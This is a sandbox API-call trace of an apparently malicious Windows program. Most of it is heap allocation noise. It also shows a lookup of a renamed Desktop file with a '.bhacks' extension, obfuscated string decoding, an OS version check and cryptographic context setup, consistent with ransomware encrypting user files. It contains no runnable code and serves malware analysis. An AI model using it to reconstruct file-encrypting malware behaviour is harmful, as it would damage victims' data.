0x2aa95e0 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0102.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0102.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0102.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0102.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0102.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0102.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0102.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.080] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Kz5g.mp4.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25257692, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25257692, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25362701, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4.bhacks", cAlternateFileName="KZ5GMP~1.BHA")) returned 0x9a3b80 [0102.080] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0102.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0102.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0102.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.129] TranslateMessage (lpMsg=0x8cf708) returned 0 [0102.129] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0102.129] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0102.129] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0102.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0102.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.129] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.130] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0102.130] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.130] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.131] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.131] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0102.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.132] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.132] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0102.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0102.132] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.132] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0102.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0102.133] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be890) returned 1 [0102.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.134] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd 